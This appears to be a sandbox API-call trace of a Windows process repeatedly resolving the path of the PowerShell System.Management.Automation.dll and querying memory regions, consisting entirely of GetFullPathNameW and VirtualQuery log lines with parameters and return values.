	[0338.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.960] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.961] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.961] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.961] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.963] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.963] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.963] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.963] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.966] VirtualQuery (in: lpAddress=0x14bcd0, lpBuffer=0x14cb90, dwLength=0x30 | out: lpBuffer=0x14cb90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.968] VirtualQuery (in: lpAddress=0x14bcd0, lpBuffer=0x14cb90, dwLength=0x30 | out: lpBuffer=0x14cb90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
